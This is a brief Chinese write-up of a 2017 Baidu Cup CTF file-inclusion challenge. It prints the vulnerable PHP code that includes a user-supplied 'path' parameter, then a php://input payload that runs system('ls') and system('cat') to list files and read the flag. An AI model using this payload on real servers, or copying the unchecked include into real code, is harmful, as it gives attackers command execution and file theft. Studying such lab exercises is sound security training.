“百度杯”CTF比赛 2017 二月场_include_WriteUp

打开网站

题目类型：文件包含

代码审计

<?php 
show_source(__FILE__);
if(isset($_REQUEST['path'])){
    include($_REQUEST['path']); //包含path传递的参数
}else{
    include('phpinfo.php');
}

思路

使用php://input伪协议

获得flag

payload

/?path=php://input
<?php system('ls .');?>
<?php system('cat dle345aae.php');?>